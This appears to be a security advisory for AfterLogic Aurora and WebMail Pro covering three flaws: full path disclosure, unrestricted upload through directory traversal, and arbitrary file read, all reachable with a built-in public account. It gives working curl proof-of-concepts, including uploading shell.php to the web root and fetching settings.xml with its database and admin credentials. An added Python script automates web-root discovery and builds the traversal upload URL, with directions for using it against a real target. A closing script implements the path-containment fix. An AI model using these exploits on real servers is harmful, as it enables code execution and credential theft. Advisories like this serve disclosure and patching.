The severity of the issue: Medium
Complexity: Easy
Affected Products: AfterLogic Aurora, AfterLogic WebMail PRO
Authentication: Not required
Attacks: Full Path Disclosure
AfterLogic Aurora and WebMail Pro versions 7.7.9 and lower are affected by this vulnerability. Sending an HTTP DELETE request to the WebDAV endpoint, authenticated as the built-in “caldav_public_user@localhost” account with its predefined password “caldav_public_user”, lets an attacker obtain the web root path from the resulting error message.
Get the web root path with the following curl command:
curl -X DELETE -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/personal/GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021"
<?xml version="1.0" encoding="utf-8"?>
<d:error xmlns:d="DAV:" xmlns:s="http://sabredav.org/ns">
<s:exception>Sabre\DAV\Exception\NotFound</s:exception>
<s:message>File with name /var/www/html/www/webmailpro.dev/data/files/private/caldav_public_user@localhost/GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021 could not be located</s:message>
</d:error>
In this scenario, /var/www/html/www/webmailpro.dev is the web root path. This information becomes especially valuable when combined with file upload vulnerabilities, because the attacker then knows exactly where a file must be written for the web server to serve and execute it.
The full path disclosure originates at step 7 / getChild: the thrown \Sabre\DAV\Exception\NotFound('File with name ' . $path . ' could not be located') embeds the $path variable, which holds the absolute filesystem path and therefore the web root.
Any user who can log in can obtain the web root this way. With the caldav_public_user@localhost account, attackers need no user information at all because its password is predefined, so the vulnerability is effectively publicly accessible.
Base Score: 9.8 CRITICAL
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Complexity: Easy
Affected Products: AfterLogic Aurora, AfterLogic WebMail PRO
Authentication: Not required
Attacks: Directory Traversal, Unrestricted Upload of File with Dangerous Type, Public Built-in Credentials For Critical Function
Gained Access: WebServer user ( Apache, Nginx, Etc… )
AfterLogic Aurora and WebMail Pro versions 7.7.9 and lower are affected by this vulnerability. Sending an HTTP PUT request to the WebDAV endpoint, authenticated as the built-in “caldav_public_user@localhost” account with its predefined password “caldav_public_user”, lets an attacker create or overwrite files anywhere the web server user can write, including malicious files such as web shells or database dumpers.
After uploading a malicious PHP file under the web root, the attacker can execute arbitrary code as the web server user (Apache, Nginx, etc.), for example to run a web shell or dump the database.
Upload the malicious file with the following curl command
curl -T shell.php -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/persona/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e/var/www/html/shell.php"
As the AfterLogic WebMail Pro docs mention, “the web root usually looks like /var/www/html”, so the PoC above assumes files live under Apache’s standard /var/www/html path. The real path may differ depending on configuration, but this is not a blocker for the attacker, because some of the endpoints expose the document root path when an invalid path parameter is requested.
Ways to figure out the document root directory on customized web server configurations:
curl -X DELETE -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/personal/GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021"
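The two steps above (recover the web root from the SabreDAV error body, then build a traversal path that lands the upload under that web root) can be scripted. The following is an added example written for this page, not code from the advisory or from AfterLogic; it assumes the /dav/server.php/files/personal/ URL layout and the <web root>/data/files/private/<user>/ storage layout shown in the PoC output, and the embedded XML is a constructed copy of the error body quoted earlier so the parsing runs offline. Only fetch_error_body() talks to a target, and only if you call it.

```python
import base64
import re
import urllib.error
import urllib.request
import xml.etree.ElementTree as ET
from typing import Optional

SABRE_NS = "http://sabredav.org/ns"
BUILTIN_USER = "caldav_public_user@localhost"   # built-in account named in the advisory
BUILTIN_PASS = "caldav_public_user"             # its predefined password
PROBE_NAME = "GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021"

# Constructed sample: a copy of the SabreDAV NotFound body shown in the advisory,
# embedded here so the parser can be exercised without a live target.
SAMPLE_ERROR_XML = r"""<?xml version="1.0" encoding="utf-8"?>
<d:error xmlns:d="DAV:" xmlns:s="http://sabredav.org/ns">
<s:exception>Sabre\DAV\Exception\NotFound</s:exception>
<s:message>File with name /var/www/html/www/webmailpro.dev/data/files/private/caldav_public_user@localhost/GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021 could not be located</s:message>
</d:error>"""


def extract_web_root(error_xml: str, user: str = BUILTIN_USER,
                     probe: str = PROBE_NAME) -> Optional[str]:
    """Recover the web root from a SabreDAV NotFound body.

    The leaked path has the shape <web root>/data/files/private/<user>/<probe>
    (assumed layout, taken from the PoC output); everything before that fixed
    suffix is the web root. Returns None if the body does not match.
    """
    try:
        root = ET.fromstring(error_xml)
    except ET.ParseError:
        return None
    message = root.findtext(f"{{{SABRE_NS}}}message") or ""
    match = re.search(r"File with name (.+?) could not be located", message)
    if not match:
        return None
    leaked = match.group(1)
    suffix = f"/data/files/private/{user}/{probe}"
    if not leaked.endswith(suffix):
        return None
    return leaked[: -len(suffix)]


def storage_dir(web_root: str, user: str = BUILTIN_USER) -> str:
    """Directory the /files/personal/ DAV collection maps to for this user (assumed layout)."""
    return f"{web_root}/data/files/private/{user}"


def traversal_segment(storage: str, target_abs: str) -> str:
    """Build the request-path suffix that walks from `storage` up to / and back
    down to `target_abs`, using the %2e%2e encoding the PoC relies on.
    One ".." per directory component is enough; the PoC's surplus ones are
    harmless because "/.." at the filesystem root stays at "/"."""
    depth = len([p for p in storage.split("/") if p])
    return "%2e%2e/" * depth + target_abs.lstrip("/")


def dav_url(base_url: str, rel: str) -> str:
    """Full URL of an entry in the personal files collection (assumed URL layout)."""
    return f"{base_url.rstrip('/')}/dav/server.php/files/personal/{rel}"


def fetch_error_body(base_url: str, user: str = BUILTIN_USER,
                     password: str = BUILTIN_PASS, probe: str = PROBE_NAME) -> str:
    """Online part, not exercised offline: send the DELETE probe with the
    built-in credentials and return the body SabreDAV answers with.
    The interesting body arrives on the 404, which urllib raises as HTTPError."""
    req = urllib.request.Request(dav_url(base_url, probe), method="DELETE")
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    req.add_header("Authorization", f"Basic {token}")
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.read().decode("utf-8", "replace")


if __name__ == "__main__":
    web_root = extract_web_root(SAMPLE_ERROR_XML)
    print("web root:", web_root)
    put_path = traversal_segment(storage_dir(web_root), "/var/www/html/shell.php")
    print("PUT URL:", dav_url("https://sample-mail.tld", put_path))
```

Against a real target, replace SAMPLE_ERROR_XML with fetch_error_body("https://sample-mail.tld") and feed the result to extract_web_root(); the rest of the pipeline is unchanged. The web root is also the right target directory when the document root is not the Apache default, which is the point of running the DELETE probe first.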
The unrestricted upload and directory traversal problem starts at step 2 / exec: the given path parameters are not sanitized and the file extension is not checked, so the attacker can write into parent directories (including the web root) and then execute the uploaded file.
Any user who can log in can upload malicious files this way. With the caldav_public_user@localhost account, attackers need no user information at all because its password is predefined, so the vulnerability is effectively publicly accessible.
Base Score: 7.5 HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Complexity: Easy
Affected Products: AfterLogic Aurora, AfterLogic WebMail PRO
Authentication: Not required
Attacks: Directory Traversal, Public Built-in Credentials For Critical Function
https://owasp.org/www-community/attacks/Path_Traversal
AfterLogic Aurora and WebMail Pro versions 7.7.9 and lower are affected by this vulnerability. Sending an HTTP GET request to the WebDAV endpoint, authenticated as the built-in “caldav_public_user@localhost” account with its predefined password “caldav_public_user”, lets an attacker read any file under the web root.
Read any file with the following curl command:
curl -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/personal/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data/settings/settings.xml"
The sample curl command retrieves settings.xml, which contains the license key, database credentials, admin panel credentials, etc.
The directory traversal problem again starts at step 2 / exec: the given path parameters are not sanitized and the file extension is not checked. Combined with the httpGet business logic (reading the file content and returning it), this lets the attacker read any file under the web root.
Any user who can log in can read configuration files this way. With the caldav_public_user@localhost account, attackers need no user information at all because its password is predefined, so the vulnerability is effectively publicly accessible.
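Both the upload and the read issue come down to the same missing check in exec: the requested path is never normalised and confined to the caller's storage directory, and uploads are never screened for server-executable extensions. The following is an added example of that check, written for this page in Python rather than taken from AfterLogic's PHP code; it assumes the <storage root>/files/private/<user>/ layout seen in the PoC output, takes the path part after /files/personal/ as input, and uses an illustrative extension denylist. It is exercised against the exact payloads from the curl commands above.

```python
import posixpath
import urllib.parse

# Illustrative denylist (assumption, not AfterLogic's list): extensions a PHP-enabled
# web server would execute if the file ended up somewhere it serves. Keeping user
# storage outside the document root is the other half of the fix.
EXECUTABLE_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "phps"}


class PathRejected(ValueError):
    """Raised when a DAV path would leave the caller's storage directory."""


def _fully_decode(value: str, max_rounds: int = 3) -> str:
    """Percent-decode until stable, so %2e%2e and %252e%252e both become '..'.
    Decoding before normalising is what defeats the encoded traversal in the PoC."""
    for _ in range(max_rounds):
        decoded = urllib.parse.unquote(value)
        if decoded == value:
            return value
        value = decoded
    raise PathRejected("too many encoding layers")


def resolve_user_path(storage_root: str, user: str, requested: str,
                      for_write: bool = False) -> str:
    """Map the path after /files/personal/ onto the user's storage directory.

    Rejects anything that normalises to a location outside that directory and,
    for writes, anything with a server-executable extension. Normalisation here
    is lexical (posixpath.normpath); if users can create symlinks inside their
    storage, resolve with os.path.realpath on the real filesystem as well.
    """
    decoded = _fully_decode(requested)
    if "\x00" in decoded:
        raise PathRejected("NUL byte in path")
    base = posixpath.normpath(posixpath.join(storage_root, "files", "private", user))
    full = posixpath.normpath(posixpath.join(base, decoded.lstrip("/")))
    if full != base and not full.startswith(base + "/"):
        raise PathRejected(f"path escapes user storage: {full}")
    if for_write:
        ext = posixpath.splitext(full)[1].lstrip(".").lower()
        if ext in EXECUTABLE_EXTS:
            raise PathRejected(f"refusing to store executable file type: .{ext}")
    return full


def is_rejected(*args, **kwargs) -> bool:
    """True if resolve_user_path() refuses the request; handy for demos and tests."""
    try:
        resolve_user_path(*args, **kwargs)
    except PathRejected:
        return True
    return False


if __name__ == "__main__":
    root = "/var/www/html/www/webmailpro.dev/data"   # <web root>/data from the PoC output
    user = "caldav_public_user@localhost"
    # Constructed inputs: the path parts of the two curl PoCs above, plus benign ones.
    cases = [
        ("notes.txt", False),
        ("sub/../notes.txt", False),
        ("%2e%2e/%2e%2e//%2e%2e//%2e%2e/data/settings/settings.xml", False),
        ("%2e%2e/" * 30 + "var/www/html/shell.php", True),
        ("shell.php", True),
    ]
    for requested, write in cases:
        verdict = "REJECTED" if is_rejected(root, user, requested, for_write=write) else "ok"
        print(f"{verdict:9} write={write!s:5} {requested[:60]}")
```

The containment test compares against base + "/" rather than a bare prefix so that a sibling directory such as .../private/caldav_public_user@localhost2 is not mistaken for the user's own storage. The extension check only runs for writes: reading a .php file that already sits inside the user's storage is a legitimate download, while storing one there is not.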